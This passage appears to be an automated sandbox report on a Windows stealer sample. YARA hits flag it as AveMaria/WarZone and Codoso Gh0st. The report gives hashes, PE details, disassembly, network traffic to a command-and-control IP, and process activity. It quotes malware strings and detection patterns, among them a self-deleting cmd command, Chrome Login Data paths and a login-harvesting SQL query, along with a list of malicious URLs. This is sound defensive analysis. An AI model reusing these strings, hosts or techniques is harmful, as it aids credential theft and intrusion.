• 0x161f0:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
3.2.images.exe.430000.1.unpack | Codoso_Gh0st_2 | Detects Codoso APT Gh0st Malware | Florian Roth
• 0x161f0:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
3.2.images.exe.430000.1.unpack | Codoso_Gh0st_1 | Detects Codoso APT Gh0st Malware | Florian Roth
• 0x161f0:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
• 0x161f0:$c1: Elevation:Administrator!new:
0.2.4ifN8B061M.exe.250000.1.unpack | Codoso_Gh0st_1_RID2C2D | Detects Codoso APT Gh0st Malware | Florian Roth
• 0x161f0:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
• 0x161f0:$c1: Elevation:Administrator!new:
3.2.images.exe.430000.1.unpack | Codoso_Gh0st_2_RID2C2E | Detects Codoso APT Gh0st Malware | Florian Roth
• 0x161f0:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
3.2.images.exe.430000.1.unpack | Codoso_Gh0st_1_RID2C2D | Detects Codoso APT Gh0st Malware | Florian Roth
• 0x161f0:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
• 0x161f0:$c1: Elevation:Administrator!new:
0.2.4ifN8B061M.exe.250000.1.unpack | JoeSecurity_AveMaria | Yara detected AveMaria stealer | Joe Security
3.2.images.exe.430000.1.unpack | JoeSecurity_AveMaria | Yara detected AveMaria stealer | Joe Security
0.2.4ifN8B061M.exe.250000.1.unpack | AveMaria_WarZone | unknown | unknown
• 0x13644:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q
• 0x13514:$str2: MsgBox.exe
• 0x136b0:$str4: \System32\cmd.exe
• 0x133e8:$str6: Ave_Maria
• 0x12620:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
• 0x12000:$str8: SMTP Password
• 0x11b50:$str11: \Google\Chrome\User Data\Default\Login Data
• 0x125ec:$str12: \sqlmap.dll
• 0x11b28:$str14: SELECT * FROM logins
• 0x161f0:$str16: Elevation:Administrator!new
• 0x16310:$str17: /n:%temp%
3.2.images.exe.430000.1.unpack | AveMaria_WarZone | unknown | unknown
• 0x13644:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q
• 0x13514:$str2: MsgBox.exe
• 0x136b0:$str4: \System32\cmd.exe
• 0x133e8:$str6: Ave_Maria
• 0x12620:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
• 0x12000:$str8: SMTP Password
• 0x11b50:$str11: \Google\Chrome\User Data\Default\Login Data
• 0x125ec:$str12: \sqlmap.dll
• 0x11b28:$str14: SELECT * FROM logins
• 0x161f0:$str16: Elevation:Administrator!new
• 0x16310:$str17: /n:%temp%

                              Sigma Overview

                              No Sigma rule has matched

                              Joe Sandbox View / Context

                              IPs

                              No context

                              Domains

                              No context

                              ASN

Match: unknown
Associated Sample Name / URL | SHA 256 | Detection | Link | Context
https://gardenario.wepbro.com/wp-includes/privata-sezione/interni-5049405216-3JcvOrExSuWC8h/lnvf9373-vw64t721vttv/ | Get hash | malicious | Browse | 104.31.64.13
https://herbancreativenj.com/minvoice?mail=% | Get hash | malicious | Browse | 104.31.89.17
https://herbancreativenj.com/minvoice?mail=%{0:{{Recipient.Email}}}% | Get hash | malicious | Browse | 104.31.88.17
http://wp-demo-wp04.vicoders.com/wp-content/mne0e-fl6ho-91193/ | Get hash | malicious | Browse | 47.98.241.4
https://herbancreativenj.com/minvoice?mail=%{0:{{Recipient.Email}}}% | Get hash | malicious | Browse | 104.31.88.17
http://networkscy.incyprus.net/e1dd/bnpr-m7a-4615/ | Get hash | malicious | Browse | 104.16.123.96
cron | Get hash | malicious | Browse | 45.9.148.125
http://cdnus.filesupdatehead.com/ofr/Famofama/01_07_19/Famofama_pages.zip | Get hash | malicious | Browse | 199.115.112.67
http://27.69.242.187 | Get hash | malicious | Browse | 159.148.172.231
http://www2.formatta.com/download/fillersetup.exe | Get hash | malicious | Browse | 40.84.144.206
vij.exe | Get hash | malicious | Browse | 139.28.39.70
SAMPLE.exe | Get hash | malicious | Browse | 127.0.0.1
cron | Get hash | malicious | Browse | 45.9.148.129
ze99HWZnJK.exe | Get hash | malicious | Browse | 52.97.183.194
https://kbelectricals.co.in/varujy3/ox07-svj-94 | Get hash | malicious | Browse | 103.28.36.212
http://solarsistem.net/doc/8me4x/* | Get hash | malicious | Browse | 162.241.24.173
http://lakewin.org/wp-admin/j19x/* | Get hash | malicious | Browse | 162.241.24.26
http://vanguardesigns.com/akbadminton/0412/* | Get hash | malicious | Browse | 162.241.24.179
http://nowotnik.com/nqrgo8/cy3a6/' | Get hash | malicious | Browse | 50.87.253.50
http://ngiveu.com/hcy5u/icv4/* | Get hash | malicious | Browse | 49.235.41.178

                              JA3 Fingerprints

                              No context

                              Dropped Files

                              No context

                              Screenshots

                              Thumbnails

                              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                              Startup

                              • System is w7_1
                              • 4ifN8B061M.exe (PID: 3380 cmdline: 'C:\Users\user\Desktop\4ifN8B061M.exe' MD5: 94FF625253B3920FE5B6824BD8C30482)
                                • images.exe (PID: 3596 cmdline: C:\ProgramData\images.exe MD5: 94FF625253B3920FE5B6824BD8C30482)
                              • images.exe (PID: 3804 cmdline: 'C:\ProgramData\images.exe' MD5: 94FF625253B3920FE5B6824BD8C30482)
                              • cleanup

                              Created / dropped Files

                              C:\ProgramData\images.exe
Process: C:\Users\user\Desktop\4ifN8B061M.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Size (bytes): 874592
Entropy (8bit): 4.285697737343411
Encrypted: false
MD5: 94FF625253B3920FE5B6824BD8C30482
SHA1: BD2DC8A13C592360AC1E091B397C62AC8574D10A
SHA-256: E78E25771A0E710D9CC8B0EF306197AA8BC061D1A1D0282E19A6F3597C7A4E14
SHA-512: 9BDEAA585730E2CA31F1966D15329A23BBDD6A1560C01C58558B51A21ADDF568DB89D41F9E0F7040393A690E0ACD74EA1EBF97059AAFADE637B864D7C55DAEDA
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation: low
                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Q..T............f.......f.......f.......G...1...G.......f...4...........G.................!.............Rich....................PE..L...%N.].....................@......b........ ....@.................................#<....@....................................T....0...............:..`....@...;......8...............................@............ ..4............................text............................... ..`.rdata..B.... ......................@..@.data....w.......j..................@....rsrc........0......................@..@.reloc...;...@...<..................@..B........................................................................................................................................................................................................................................................................................................
                              C:\ProgramData\images.exe:Zone.Identifier
Process: C:\Users\user\Desktop\4ifN8B061M.exe
File Type: ASCII text, with CRLF line terminators
Size (bytes): 26
Entropy (8bit): 3.95006375643621
Encrypted: false
MD5: 187F488E27DB4AF347237FE461A079AD
SHA1: 6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256: 255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512: 89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious: true
Reputation: high, very likely benign file
                              Preview: [ZoneTransfer]....ZoneId=0

                              Domains and IPs

                              Contacted Domains

                              No contacted domains info

                              URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s | 4ifN8B061M.exe | false | 0%, Virustotal, Browse; URL Reputation: safe | low
http://crl.thawte.com/ThawteTimestampingCA.crl0 | 4ifN8B061M.exe | false | | high
http://ocsp.sectigo.com0 | 4ifN8B061M.exe | false | URL Reputation: safe | unknown
https://github.com/syohex/java-simple-mine-sweeperC: | 4ifN8B061M.exe, 00000000.00000002.424063177.00230000.00000040.00000001.sdmp, images.exe, 00000003.00000003.566547321.0012A000.00000004.00000001.sdmp | false | | high
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0# | 4ifN8B061M.exe | false | 0%, Virustotal, Browse; URL Reputation: safe | low
http://ocsp.thawte.com0 | 4ifN8B061M.exe | false | URL Reputation: safe | unknown
https://github.com/syohex/java-simple-mine-sweeper | 4ifN8B061M.exe, images.exe | false | | high
https://sectigo.com/CPS0C | 4ifN8B061M.exe | false | URL Reputation: safe | low

                                    Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public

IP | Country | Flag | ASN | ASN Name | Malicious
45.133.183.138 | Romania | | 9009 | unknown | false

                                    Static File Info

                                    General

File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 4.285697737343411
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: 4ifN8B061M.exe
File size: 874592
MD5: 94ff625253b3920fe5b6824bd8c30482
SHA1: bd2dc8a13c592360ac1e091b397c62ac8574d10a
SHA256: e78e25771a0e710d9cc8b0ef306197aa8bc061d1a1d0282e19a6f3597c7a4e14
SHA512: 9bdeaa585730e2ca31f1966d15329a23bbdd6a1560c01c58558b51a21addf568db89d41f9e0f7040393a690e0acd74ea1ebf97059aafade637b864d7c55daeda
SSDEEP: 6144:yRhq8lbNztvIYqvNUKfW2Zb7xmuFKK2EikdRupxXqR4XFp:yRhq2vIYqvvW2lxRFKbuRupA4XFp
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Q..T............f.......f.......f.......G...1...G.......f...4...........G.................!.............Rich...................

                                    File Icon

Icon Hash: aab2e3e39383aa00

                                    Static PE Info

                                    General

Entrypoint: 0x401462
Entrypoint Section: .text
Digitally signed: true
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: 32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp: 0x5DDA4E25 [Sun Nov 24 09:32:21 2019 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 6
OS Version Minor: 0
File Version Major: 6
File Version Minor: 0
Subsystem Version Major: 6
Subsystem Version Minor: 0
Import Hash: 965b965b72f5b01661f49f8cafb546f0

                                    Authenticode Signature

Signature Valid: true
Signature Issuer: CN=Sectigo RSA Code Signing CA, O=Sectigo Limited, L=Salford, S=Greater Manchester, C=GB
Signature Validation Error: The operation completed successfully
Error Number: 0
Not Before, Not After
• Not Before: 11/6/2019 1:00:00 AM; Not After: 7/25/2020 1:59:59 AM
Subject Chain
• CN="TOV, FAN-CHAI", O="TOV, FAN-CHAI", STREET="Ofis 25, Bud. 13 Vul.Klovsky Uzviz", L=Kyiv, S=Kyiv, PostalCode=01021, C=UA
Version: 3
Thumbprint MD5: EFC8F3706CED61C8C3C0EF99A536ECD9
Thumbprint SHA-1: E79EF654B3330B678FC3B4ADB6C2FB721455C4AD
Thumbprint SHA-256: 65D22885399551698B87F2DB1351A1A9B8214F6E80B6EF505A21993090D0AA26
Serial: 6CB82AC5FF6DE912CF66D257F1BC16F6

                                    Entrypoint Preview

                                    Instruction
                                    call 00007F76ACEDD091h
                                    jmp 00007F76ACEDCC1Fh
                                    push ebp
                                    mov ebp, esp
                                    mov eax, dword ptr [0042B018h]
                                    and eax, 1Fh
                                    push 00000020h
                                    pop ecx
                                    sub ecx, eax
                                    mov eax, dword ptr [ebp+08h]
                                    ror eax, cl
                                    xor eax, dword ptr [0042B018h]
                                    pop ebp
                                    ret
                                    push ebp
                                    mov ebp, esp
                                    mov eax, dword ptr [ebp+08h]
                                    push esi
                                    mov ecx, dword ptr [eax+3Ch]
                                    add ecx, eax
                                    movzx eax, word ptr [ecx+14h]
                                    lea edx, dword ptr [ecx+18h]
                                    add edx, eax
                                    movzx eax, word ptr [ecx+06h]
                                    imul esi, eax, 28h
                                    add esi, edx
                                    cmp edx, esi
                                    je 00007F76ACEDCDBBh
                                    mov ecx, dword ptr [ebp+0Ch]
                                    cmp ecx, dword ptr [edx+0Ch]
                                    jc 00007F76ACEDCDACh
                                    mov eax, dword ptr [edx+08h]
                                    add eax, dword ptr [edx+0Ch]
                                    cmp ecx, eax
                                    jc 00007F76ACEDCDAEh
                                    add edx, 28h
                                    cmp edx, esi
                                    jne 00007F76ACEDCD8Ch
                                    xor eax, eax
                                    pop esi
                                    pop ebp
                                    ret
                                    mov eax, edx
                                    jmp 00007F76ACEDCD9Bh
                                    push esi
                                    call 00007F76ACEDD524h
                                    test eax, eax
                                    je 00007F76ACEDCDC2h
                                    mov eax, dword ptr fs:[00000018h]
                                    mov esi, 004D18E4h
                                    mov edx, dword ptr [eax+04h]
                                    jmp 00007F76ACEDCDA6h
                                    cmp edx, eax
                                    je 00007F76ACEDCDB2h
                                    xor eax, eax
                                    mov ecx, edx
                                    lock cmpxchg dword ptr [esi], ecx
                                    test eax, eax
                                    jne 00007F76ACEDCD92h
                                    xor al, al
                                    pop esi
                                    ret
                                    mov al, 01h
                                    pop esi
                                    ret
                                    push ebp
                                    mov ebp, esp
                                    cmp dword ptr [ebp+08h], 00000000h
                                    jne 00007F76ACEDCDA9h
                                    mov byte ptr [004D18E8h], 00000001h
                                    call 00007F76ACEDD34Ch
                                    call 00007F76ACEDD7B3h
                                    test al, al
                                    jne 00007F76ACEDCDA6h
                                    xor al, al
                                    pop ebp
                                    ret
                                    call 00007F76ACEE12C8h
                                    test al, al
                                    jne 00007F76ACEDCDACh

                                    Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x29bdc | 0x154 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xd3000 | 0x1e0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0xd3a00 | 0x1e60 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xd4000 | 0x3bc0 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x29480 | 0x38 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x294b8 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x22000 | 0x234 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                    Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x202a5 | 0x20400 | False | 0.483852652616 | data | 6.49296073097 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata | 0x22000 | 0x8942 | 0x8a00 | False | 0.446359827899 | data | 5.34613683148 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x2b000 | 0xa77f0 | 0xa6a00 | False | 0.181593738278 | DOS executable (block device driver \277DN) | 3.15265096008 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc | 0xd3000 | 0x1e0 | 0x200 | False | 0.52734375 | data | 4.70189840452 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xd4000 | 0x3bc0 | 0x3c00 | False | 0.651692708333 | data | 6.57845878967 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                    Resources

Name | RVA | Size | Type | Language | Country
RT_MANIFEST | 0xd3060 | 0x17d | XML 1.0 document text | English | United States

                                    Imports

DLL | Import
VERSION.dll | GetFileVersionInfoSizeW, GetFileVersionInfoW
WS2_32.dll | htons, inet_addr, connect, socket, WSAStartup
KERNEL32.dll | FindNextFileW, FlushFileBuffers, FlushViewOfFile, GetComputerNameExW, GetConsoleCP, GetConsoleMode, GetCurrentDirectoryW, HeapCreate, PeekNamedPipe, PostQueuedCompletionStatus, SetFileAttributesW, SetFilePointerEx, SetHandleInformation, SetInformationJobObject, Sleep, VirtualAlloc, VirtualAllocEx, FindFirstFileExW, VirtualFreeEx, VirtualProtect, VirtualProtectEx, VirtualQuery, VirtualQueryEx, GetPhysicallyInstalledSystemMemory, QueryPerformanceCounter, FindClose, GetFileType, DeleteFileW, CreateSemaphoreW, CreateEventW, CreateDirectoryW, ConnectNamedPipe, GetProcessHeap, HeapSize, HeapReAlloc, CloseHandle, CreateFileW, WriteConsoleW, FindFirstFileExA, LCMapStringW, VirtualFree, DecodePointer, GetStringTypeW, SetStdHandle, FindNextFileA, HeapFree, HeapAlloc, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetCommandLineA, GetACP, GetCPInfo, GetOEMCP, IsValidCodePage, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, IsProcessorFeaturePresent, GetModuleHandleW, GetCurrentProcess, TerminateProcess, RtlUnwind, GetLastError, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, RaiseException, GetStdHandle, WriteFile, GetModuleFileNameA, MultiByteToWideChar, WideCharToMultiByte, ExitProcess, GetModuleHandleExW
USER32.dll | UnregisterClassW, CreateDesktopW, CloseWindowStation, CloseDesktop, DrawFrameControl
ADVAPI32.dll | EventUnregister, ConvertSidToStringSidW, GetTokenInformation, GetKernelObjectSecurity, GetAce, FreeSid, EventWrite, AccessCheck, EventRegister, EqualSid, DuplicateTokenEx, DuplicateToken
SHELL32.dll | SHGetKnownFolderPath, SHGetFolderPathW
ADVPACK.dll | RebootCheckOnInstallW
dhcpcsvc.DLL | McastApiStartup
gdiplus.dll | GdipSetMatrixElements
PROPSYS.dll | PropVariantToInt32
TAPI32.dll | lineGetAddressCapsA
TRAFFIC.dll | TcQueryInterface
VSSAPI.DLL | CreateVssBackupComponentsInternal
wevtapi.dll | EvtGetPublisherMetadataProperty
WINTRUST.dll | CryptCATPersistStore
XmlLite.dll | CreateXmlWriterOutputWithEncodingCodePage

                                    Possible Origin

Language of compilation system | Country where language is spoken | Map
English | United States |

                                    Network Behavior

                                    Network Port Distribution

                                    TCP Packets

                                     Timestamp                           Source Port  Dest Port  Source IP      Dest IP
                                     Dec 9, 2019 09:33:04.257024050 CET  49169        53         192.168.1.16   8.8.8.8
                                     Dec 9, 2019 09:33:04.280456066 CET  53           49169      8.8.8.8        192.168.1.16
                                     Dec 9, 2019 09:33:04.280795097 CET  49169        53         192.168.1.16   8.8.8.8
                                     Dec 9, 2019 09:33:06.305363894 CET  53           49169      8.8.8.8        192.168.1.16
                                     Dec 9, 2019 09:33:06.308520079 CET  49169        53         192.168.1.16   8.8.8.8
                                     Dec 9, 2019 09:33:07.911324024 CET  49169        53         192.168.1.16   8.8.8.8
                                     Dec 9, 2019 09:34:04.358297110 CET  49170        53         192.168.1.16   8.8.8.8
                                     Dec 9, 2019 09:34:04.381735086 CET  53           49170      8.8.8.8        192.168.1.16
                                     Dec 9, 2019 09:34:04.382009029 CET  49170        53         192.168.1.16   8.8.8.8
                                     Dec 9, 2019 09:34:06.405953884 CET  53           49170      8.8.8.8        192.168.1.16
                                     Dec 9, 2019 09:34:06.406146049 CET  49170        53         192.168.1.16   8.8.8.8
                                     Dec 9, 2019 09:34:08.325558901 CET  49171        5200       192.168.1.16   45.133.183.138
                                     Dec 9, 2019 09:34:11.324734926 CET  49171        5200       192.168.1.16   45.133.183.138
                                     Dec 9, 2019 09:34:15.368417978 CET  49172        53         192.168.1.16   8.8.8.8
                                     Dec 9, 2019 09:34:15.391953945 CET  53           49172      8.8.8.8        192.168.1.16
                                     Dec 9, 2019 09:34:15.392064095 CET  49172        53         192.168.1.16   8.8.8.8

                                    UDP Packets

                                     Timestamp                           Source Port  Dest Port  Source IP      Dest IP
                                     Dec 9, 2019 09:32:03.925107002 CET  57034        53         192.168.1.16   8.8.8.8
                                     Dec 9, 2019 09:32:03.966739893 CET  53           57034      8.8.8.8        192.168.1.16
                                     Dec 9, 2019 09:32:03.974251986 CET  63068        53         192.168.1.16   8.8.8.8
                                     Dec 9, 2019 09:32:04.007591009 CET  53           63068      8.8.8.8        192.168.1.16
                                     Dec 9, 2019 09:32:04.150613070 CET  52162        53         192.168.1.16   8.8.8.8
                                     Dec 9, 2019 09:32:04.174222946 CET  53           52162      8.8.8.8        192.168.1.16
                                     Dec 9, 2019 09:32:05.150875092 CET  52162        53         192.168.1.16   8.8.8.8
                                     Dec 9, 2019 09:32:05.176254034 CET  53           52162      8.8.8.8        192.168.1.16
                                     Dec 9, 2019 09:32:06.168806076 CET  52162        53         192.168.1.16   8.8.8.8
                                     Dec 9, 2019 09:32:06.192899942 CET  53           52162      8.8.8.8        192.168.1.16
                                     Dec 9, 2019 09:32:08.166450024 CET  52162        53         192.168.1.16   8.8.8.8
                                     Dec 9, 2019 09:32:08.189980984 CET  53           52162      8.8.8.8        192.168.1.16
                                     Dec 9, 2019 09:32:12.166918993 CET  52162        53         192.168.1.16   8.8.8.8
                                     Dec 9, 2019 09:32:12.190679073 CET  53           52162      8.8.8.8        192.168.1.16
                                     Dec 9, 2019 09:33:16.274024963 CET  52137        53         192.168.1.16   8.8.8.8
                                     Dec 9, 2019 09:33:16.297591925 CET  53           52137      8.8.8.8        192.168.1.16
                                     Dec 9, 2019 09:33:17.260957003 CET  52137        53         192.168.1.16   8.8.8.8
                                     Dec 9, 2019 09:33:17.284552097 CET  53           52137      8.8.8.8        192.168.1.16
                                     Dec 9, 2019 09:33:18.260999918 CET  52137        53         192.168.1.16   8.8.8.8
                                     Dec 9, 2019 09:33:18.284573078 CET  53           52137      8.8.8.8        192.168.1.16
                                     Dec 9, 2019 09:33:20.261075974 CET  52137        53         192.168.1.16   8.8.8.8
                                     Dec 9, 2019 09:33:20.288018942 CET  53           52137      8.8.8.8        192.168.1.16
                                     Dec 9, 2019 09:33:24.260509968 CET  52137        53         192.168.1.16   8.8.8.8
                                     Dec 9, 2019 09:33:24.284087896 CET  53           52137      8.8.8.8        192.168.1.16

                                    Code Manipulations

                                    Statistics

                                    CPU Usage

                                    Memory Usage

                                    High Level Behavior Distribution

                                    Behavior

                                    System Behavior

                                    General

                                    Start time:09:31:45
                                    Start date:09/12/2019
                                    Path:C:\Users\user\Desktop\4ifN8B061M.exe
                                    Wow64 process (32bit):false
                                    Commandline:'C:\Users\user\Desktop\4ifN8B061M.exe'
                                    Imagebase:0x12e0000
                                    File size:874592 bytes
                                    MD5 hash:94FF625253B3920FE5B6824BD8C30482
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp, Author: Florian Roth
                                    • Rule: Codoso_Gh0st_1_RID2C2D, Description: Detects Codoso APT Gh0st Malware, Source: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp, Author: Florian Roth
                                    • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000000.00000002.424063177.00230000.00000040.00000001.sdmp, Author: Florian Roth
                                    • Rule: Codoso_Gh0st_1_RID2C2D, Description: Detects Codoso APT Gh0st Malware, Source: 00000000.00000002.424063177.00230000.00000040.00000001.sdmp, Author: Florian Roth
                                    • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000000.00000002.424063177.00230000.00000040.00000001.sdmp, Author: Joe Security
                                    • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000000.00000003.422033804.003DD000.00000004.00000001.sdmp, Author: Florian Roth
                                    • Rule: Codoso_Gh0st_1_RID2C2D, Description: Detects Codoso APT Gh0st Malware, Source: 00000000.00000003.422033804.003DD000.00000004.00000001.sdmp, Author: Florian Roth
                                    • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000000.00000003.422033804.003DD000.00000004.00000001.sdmp, Author: Joe Security
                                    • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000000.00000003.422009641.003DA000.00000004.00000001.sdmp, Author: Florian Roth
                                    • Rule: Codoso_Gh0st_1_RID2C2D, Description: Detects Codoso APT Gh0st Malware, Source: 00000000.00000003.422009641.003DA000.00000004.00000001.sdmp, Author: Florian Roth
                                    • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000000.00000003.422009641.003DA000.00000004.00000001.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp, Author: Joe Security
                                    • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000000.00000003.421973490.003CD000.00000004.00000001.sdmp, Author: Florian Roth
                                    • Rule: Codoso_Gh0st_1_RID2C2D, Description: Detects Codoso APT Gh0st Malware, Source: 00000000.00000003.421973490.003CD000.00000004.00000001.sdmp, Author: Florian Roth
                                    • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000000.00000003.421973490.003CD000.00000004.00000001.sdmp, Author: Joe Security
                                    Reputation:low

                                    General

                                    Start time:09:32:44
                                    Start date:09/12/2019
                                    Path:C:\ProgramData\images.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\ProgramData\images.exe
                                    Imagebase:0xcc0000
                                    File size:874592 bytes
                                    MD5 hash:94FF625253B3920FE5B6824BD8C30482
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000003.00000003.566547321.0012A000.00000004.00000001.sdmp, Author: Joe Security
                                    • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000003.00000003.565700412.0013A000.00000004.00000001.sdmp, Author: Florian Roth
                                    • Rule: Codoso_Gh0st_1_RID2C2D, Description: Detects Codoso APT Gh0st Malware, Source: 00000003.00000003.565700412.0013A000.00000004.00000001.sdmp, Author: Florian Roth
                                    • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp, Author: Florian Roth
                                    • Rule: Codoso_Gh0st_1_RID2C2D, Description: Detects Codoso APT Gh0st Malware, Source: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp, Author: Florian Roth
                                    • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp, Author: Joe Security
                                    • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000003.00000003.567703677.0013A000.00000004.00000001.sdmp, Author: Florian Roth
                                    • Rule: Codoso_Gh0st_1_RID2C2D, Description: Detects Codoso APT Gh0st Malware, Source: 00000003.00000003.567703677.0013A000.00000004.00000001.sdmp, Author: Florian Roth
                                    • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000003.00000003.567782220.0012C000.00000004.00000001.sdmp, Author: Joe Security
                                    • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000003.00000003.564800575.00130000.00000004.00000001.sdmp, Author: Florian Roth
                                    • Rule: Codoso_Gh0st_1_RID2C2D, Description: Detects Codoso APT Gh0st Malware, Source: 00000003.00000003.564800575.00130000.00000004.00000001.sdmp, Author: Florian Roth
                                    • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000003.00000003.564800575.00130000.00000004.00000001.sdmp, Author: Joe Security
                                    • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000003.00000002.577668662.00410000.00000040.00000001.sdmp, Author: Florian Roth
                                    • Rule: Codoso_Gh0st_1_RID2C2D, Description: Detects Codoso APT Gh0st Malware, Source: 00000003.00000002.577668662.00410000.00000040.00000001.sdmp, Author: Florian Roth
                                    • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000003.00000002.577668662.00410000.00000040.00000001.sdmp, Author: Joe Security
                                    Antivirus matches:
                                    • Detection: 100%, Avira
                                    • Detection: 100%, Joe Sandbox ML
                                    Reputation:low

                                    General

                                    Start time:09:32:55
                                    Start date:09/12/2019
                                    Path:C:\ProgramData\images.exe
                                    Wow64 process (32bit):false
